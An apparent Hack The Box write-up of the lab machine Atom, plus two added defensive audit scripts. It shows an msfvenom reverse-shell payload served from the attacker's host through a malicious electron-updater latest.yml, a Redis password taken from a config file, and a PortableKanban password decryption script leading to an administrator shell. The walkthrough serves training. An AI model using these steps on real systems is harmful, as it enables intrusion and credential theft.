
# Hack The Box Write-Up Atom - 10.10.10.237

It’s the right idea, but not the right time

John Dalton

In this post, I'm writing a write-up for the machine Atom from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.

Atom is a 'Medium' rated box. Submitting the user.txt flag raises your points by 15, and submitting the root flag raises your points by 30.

## Foothold

The initial port scan with Nmap finds three open ports. Two ports, 80/tcp and 443/tcp, belong to a web service, and the last one, 445/tcp, is the port used by the SMB protocol. After enumerating SMB we find a PDF file that talks about electron-builder. After some searching online we find a Remote Code Execution vulnerability in version 1.2.3 of the Electron Updater.

## User

We create a reverse shell payload with msfvenom and use the latest.yml file to make the machine download this payload and give us a reverse shell. After the reverse shell, we are authenticated as the user jason on this machine.

## Root

In the Downloads folder of the user Jason, we find a directory called PortableKanban. After some searching on the internet, we find a password decryption vulnerability in this application. After further searching, we also find that Redis Server is installed on this machine. Through the configuration files of Redis, we find a password. With this password, we establish a connection to this machine with redis-cli. With redis-dump, we dump the keys and hashes and obtain an encrypted password for the user account Administrator. After some modifications to the password decryption script for PortableKanban, we establish an Evil-WinRM session to the machine and own Atom.

# Machine Info

- Machine Name: Atom
- Difficulty: Medium
- Points: 30
- Release Date: 17 Apr 2021
- IP: 10.10.10.237
- Creator: MrR3boot

# Recon

## Port scan with Nmap

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# nmap -sC -sV -oA ./nmap/10.10.10.237 10.10.10.237
```

The results.

```text
Nmap scan report for atom.htb (10.10.10.237)
Host is up (0.067s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
135/tcp open  msrpc        Microsoft Windows RPC
443/tcp open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h24m08s, deviation: 4h02m32s, median: 4m06s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-06-04T12:24:35-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-04T19:24:35
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Fri Jun  4 15:21:04 2021 -- 1 IP address (1 host up) scanned in 63.26 seconds
```

Well, we have some results. Let's read them carefully. First, we determine the open ports. The first discovered open port is 80/tcp; a website is running behind this port on Apache/2.4.46. The website has the HTTP title Heed Solutions. The HTTPS port 443/tcp points to the same website. The third open port is 135/tcp, the default Windows RPC port; through this protocol we can try to enumerate the system and its users. 445/tcp is the default port for SMB, a file sharing protocol used by Microsoft operating systems. Through the open SMB port we see that this machine is running Windows 10 Pro 19042, which is the 20H2 build of Windows 10, released in October 2020. This information was available through the user account guest; we keep that account name in mind.

After adding the hostname atom.htb to our hosts file, we can visit the website at https://atom.htb. First, we checked the self-signed certificate for information, but there is no email address or anything else of interest visible. We checked the website; it does not give much information, as it is only a website for a software application. The Windows download button leads us to https://atom.htb/releases/heed_setup_v1.0.0.zip, a download of a small application.

As the website is not giving us enough information to proceed on, we jump over to the next protocol: Server Message Block (SMB).

# Enumeration

## Enumerating SMB

Let's start with smbmap to check for available shares. We do this with the user account guest.

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# smbmap -H 10.10.10.237 -u guest
[+] IP: 10.10.10.237:445    Name: atom.htb
        Disk                    Permissions     Comment
        ----                    -----------     -------
        ADMIN$                  NO ACCESS       Remote Admin
        C$                      NO ACCESS       Default share
        IPC$                    READ ONLY       Remote IP
        Software_Updates        READ, WRITE
```

Let’s access those shares with smbclient.

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# smbclient //atom.htb/Software_Updates
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Sat Jun  5 10:26:25 2021
  ..                                  D        0  Sat Jun  5 10:26:25 2021
  client1                             D        0  Sat Jun  5 10:26:25 2021
  client2                             D        0  Sat Jun  5 10:26:25 2021
  client3                             D        0  Sat Jun  5 10:26:25 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 07:18:08 2021

\client1
  .                                   D        0  Sat Jun  5 10:26:25 2021
  ..                                  D        0  Sat Jun  5 10:26:25 2021

\client2
  .                                   D        0  Sat Jun  5 10:26:25 2021
  ..                                  D        0  Sat Jun  5 10:26:25 2021

\client3
  .                                   D        0  Sat Jun  5 10:26:25 2021
  ..                                  D        0  Sat Jun  5 10:26:25 2021

                4413951 blocks of size 4096. 1368892 blocks available
```

There is a UAT_Testing_Procedures.pdf file. With get we can download this file to our system.

```console
smb: \> get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (59.4 KiloBytes/sec) (average 59.4 KiloBytes/sec)
```

The UAT_Testing_Procedures.pdf talks about electron-builder. Is that the application being offered as a download from the website? After spending some time on the internet, I found an article describing an application called Electron Updater, which has a Remote Code Execution vulnerability in version 1.2.3. I found the information in this article: https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html. This article also explains how to exploit this vulnerability.

# Exploitation

## Electron-Updater Remote Code Execution

Let's create our latest.yml file with a reverse shell payload. First, let's create the reverse shell payload with msfvenom.

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.184 LPORT=4444 -f exe > "s'hell.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
```

We can now calculate the SHA-512 checksum of the payload and convert it to base64, which is the format latest.yml expects.

```console
┌──(root💀kali)-[/home/…/htb/machines/atom/http]
└─# shasum -a 512 "s'hell.exe" | cut -d " " -f1 | xxd -r -p | base64
yk6irOV/MlSY5BEDFR2aXg+41HTSyB0ggJBDXrcbJ0hVzaXS/gRNapGMtHElyXJqme4tgjiSFXrIG3LDx9a/gQ==
```

We can now create our latest.yml file that points to our malicious reverse shell.

```yaml
version: 1.2.3
files:
  - path: http://10.10.16.184/s'hell.exe
    sha512: yk6irOV/MlSY5BEDFR2aXg+41HTSyB0ggJBDXrcbJ0hVzaXS/gRNapGMtHElyXJqme4tgjiSFXrIG3LDx9a/gQ==
```

We can now put our latest.yml in the //atom.htb/Software_Updates share and wait with our listener for a reverse shell with Meterpreter. After some tries, I found out that the payload has to be uploaded to the /client1 folder.
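An added example, not from the write-up or the electron-builder project: a Python check that an update server or CI step could run over a latest.yml before publishing it. It rejects a `path` that is not a bare installer filename (the property the manifest above relies on) and recomputes the base64 SHA-512 exactly as the shasum pipeline above does. The minimal YAML reader and the `files:` list layout are assumptions; the sample artifact and manifests are constructed.

```python
import base64
import hashlib
import re

# Only bare installer filenames are acceptable; a URL, a quote or a path
# separator in `path` is the tell-tale of the manifest shape used above.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]+\.exe$")


def checksum_b64(data):
    # Same value as: shasum -a 512 file | cut -d " " -f1 | xxd -r -p | base64
    return base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def parse_latest_yml(text):
    # Minimal reader for the keys used on this page: version, files[].path,
    # files[].sha512 (assumption: no other nesting, so pyyaml is not needed).
    meta = {"version": None, "files": []}
    for line in text.splitlines():
        key, _, value = line.strip().lstrip("- ").partition(":")
        value = value.strip()
        if key == "version":
            meta["version"] = value
        elif key == "path":
            meta["files"].append({"path": value})
        elif key == "sha512" and meta["files"]:
            meta["files"][-1]["sha512"] = value
    return meta


def audit_update(yml_text, artifact_bytes):
    """Return findings for a manifest; an empty list means it passed."""
    findings = []
    files = parse_latest_yml(yml_text)["files"]
    if not files:
        findings.append("manifest lists no files")
    for entry in files:
        path = entry.get("path", "")
        if not SAFE_NAME.match(path):
            findings.append(f"unsafe path {path!r}: expected a bare .exe filename")
        if entry.get("sha512") != checksum_b64(artifact_bytes):
            findings.append("sha512 mismatch between manifest and artifact")
    return findings


# Constructed sample artifact and manifests (not a real binary or checksum).
FAKE_ARTIFACT = b"MZ-not-a-real-installer"
GOOD_YML = ("version: 1.2.3\nfiles:\n  - path: heed-setup-1.2.3.exe\n"
            f"    sha512: {checksum_b64(FAKE_ARTIFACT)}\n")
BAD_YML = ("version: 1.2.3\nfiles:\n  - path: http://10.10.16.184/s'hell.exe\n"
           f"    sha512: {checksum_b64(FAKE_ARTIFACT)}\n")
```

The checksum alone would have passed the manifest above, since it was computed over the payload itself; only the path rule rejects it.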

# Intrusion

## Shell as jason

After a minute of waiting, the reverse shell is established.

```console
┌──(root💀kali)-[/home/…/htb/machines/atom/http]
└─# msfconsole
...
msf6 exploit(multi/handler) > use payload/windows/x64/shell_reverse_tcp
msf6 payload(windows/x64/shell_reverse_tcp) > set lhost 10.10.16.184
lhost => 10.10.16.184
msf6 payload(windows/x64/shell_reverse_tcp) > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 10.10.16.184
lhost => 10.10.16.184
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.184:4444
[*] Command shell session 1 opened (10.10.16.184:4444 -> 10.10.10.237:62620) at 2021-06-12 15:00:29 -0400

C:\WINDOWS\system32>whoami
whoami
atom\jason
```

Let’s check if we can grab the user flag.

```console
C:\WINDOWS\system32>cd C:\users\jason\desktop
cd C:\users\jason\desktop

C:\Users\jason\Desktop>type user.txt
type user.txt
ad465995baf522de057af9227154a770

C:\Users\jason\Desktop>
```

Nice! We have the user flag! We can now proceed to the next step: privilege escalation.

# Privilege Escalation

## Enumeration

We can now start enumerating this machine to escalate our privileges to administrator. We start by checking the installed applications and find that Redis is installed. Redis Server listens on port 6379/tcp by default; our initial port scan did not show this port. With netstat we can determine whether this port is open locally.

```console
PS C:\Program Files\Redis> netstat -ano | findstr "6379"
netstat -ano | findstr "6379"
  TCP    0.0.0.0:6379           0.0.0.0:0              LISTENING       1824
  TCP    [::]:6379              [::]:0                 LISTENING       1824
```

There is also an entry in the Downloads folder with the name PortableKanban. On Exploit-DB, I found a script for retrieving its encrypted passwords: https://www.exploit-db.com/exploits/49409. Maybe this is our way to root, but let's check further first.

```console
PS C:\Users\jason\Downloads> ls

    Directory: C:\Users\jason\Downloa

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/31/2021   2:36 AM                node_modules
d-----          4/2/2021   8:21 PM                PortableKanban
```

OK, let's check the configuration files of Redis for more information. We find a cleartext password in the redis.windows.conf file.

```console
PS C:\Program Files\Redis> cat redis.windows.conf
cat redis.windows.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscat
# Note on units: when memory size is needed, it is possible to specify
```

We now have the password kidvscat_yes_kidvscat. Let's install redis-tools and check whether we can open a redis-cli session from our machine.
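An added defender's-side example, not from the write-up: a Python audit over a redis.conf text for the two weaknesses this box chained together, no bind restriction (hence the 0.0.0.0:6379 listener in the netstat output above) and a short, cleartext requirepass. The sample config is constructed to mirror what was found; the length and character-class thresholds are assumptions.

```python
import re

# Constructed sample mirroring the write-up: bind commented out, protected
# mode off and a short cleartext requirepass (the real file is much longer).
SAMPLE_CONF = """# Redis configuration file example
# bind 127.0.0.1
protected-mode no
port 6379
requirepass kidvscat_yes_kidvscat
"""

# Bind values that expose the listener to every interface.
EXPOSED = ("0.0.0.0", "*", "::", "-::*")


def parse_redis_conf(text):
    """Return {directive: [values]} for active (non-comment) lines."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        directive, _, value = line.partition(" ")
        conf.setdefault(directive.lower(), []).append(value.strip())
    return conf


def audit_redis_conf(text):
    """Return findings for a redis.conf; an empty list means it passed."""
    conf = parse_redis_conf(text)
    findings = []
    # Redis binds to all interfaces when no bind directive is active.
    addrs = [a for v in conf.get("bind", []) for a in v.split()]
    if not addrs or any(a in EXPOSED for a in addrs):
        findings.append("listens on all interfaces: add 'bind 127.0.0.1' unless remote clients need it")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode disabled")
    pw = conf.get("requirepass")
    if not pw:
        findings.append("no requirepass: unauthenticated access")
    elif len(pw[-1]) < 32 or not re.search(r"[^A-Za-z_]", pw[-1]):
        findings.append("requirepass is short or low-entropy")
    return findings
```

The other half of this finding, the conf file being readable by an unprivileged user, is a file ACL problem that the text of the config cannot show; check it separately with icacls on the Redis directory.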

```console
┌──(root💀kali)-[/home/…/htb/machines/atom/http]
└─# sudo apt-get install redis-tools
```

We now have the utility redis-cli at our disposal. Let's connect to Redis with the password we found.

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# redis-cli -h atom.htb -p 6379 --pass kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
atom.htb:6379>
```

Yes! We have a connection to the machine through redis-cli. After some searching on the internet, I found a way to get some interesting information out of Redis. Through the command below, we learn that there are 4 keys stored in db0.

```console
atom.htb:6379> INFO
...
# Cluster
cluster_enabled:0

# Keyspace
db0:keys=4,expires=0,avg_ttl=0
```

We know that db0 holds 4 keys. Let's dump this whole database and check whether we can find more information. For this purpose, we need to install redis-dump. Before we can install that utility we need to install the package manager npm.

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# apt-get install npm
```

Then install redis-dump.

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# npm install redis-dump -g
```

## Dump database with redis-dump

We can now dump the contents of db0. By default redis-dump uses db0, so we do not have to specify a database.

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# redis-dump -h atom.htb -p 6379 -a kidvscat_yes_kidvscat > database0.txt
```

Let’s now check the contents of the database0.txt file.

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# cat database0.txt
DEL pk:ids:MetaDataClass
SADD pk:ids:MetaDataClass ffffffff-ffff-ffff-ffff-ffffffffffff
DEL pk:ids:User
SADD pk:ids:User e8e29158-d70d-44b1-a1ba-4949d52790a0
SET pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff '{"Id":"ffffffffffffffffffffffffffffffff","SchemaVersion":"4.2.0.0","SchemaVersionModified":"\/Date(1617420120000-0700)\/","SchemaVersionModifiedBy":"e8e29158d70d44b1a1ba4949d52790a0","SchemaVersionChecked":"\/Date(-62135596800000-0000)\/","SchemaVersionCheckedBy":"00000000000000000000000000000000","TimeStamp":637530169345346438}'
SET pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0 '{"Id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","Initials":"","Email":"","EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi","Role":"Admin","Inactive":false,"TimeStamp":637530169606440253}'
```

We have found an encrypted password Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi for the user account Administrator.

First we need to install the des module.

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# python3 -m pip install des
```

The next step is to modify the Python script that can decrypt the password. After some testing and fine-tuning, I came up with this script.

```python
import base64
from des import DesKey  # python3 -m pip install des


def decode(encrypted):
    # PortableKanban stores passwords as base64(DES-CBC(password)) under a
    # static key and IV, so the value from the Redis dump decrypts directly.
    data = base64.b64decode(encrypted.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    return key.decrypt(data, initial=b"XuVUm5fR", padding=True).decode('utf-8')


print(decode("Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi"))
```

We can now run this script to decrypt the password.

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# python3 49409.py
[email protected]
```

Nice! We have decrypted the password. Let's try to make a connection with evil-winrm.

## Own Atom

```console
┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# evil-winrm -u Administrator -p "[email protected]" -i atom.htb

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop; cat root.txt
a6599aeacd370059e059aac20be44561
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
```

Thanks for reading this write-up! Did you enjoy it, or learn something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)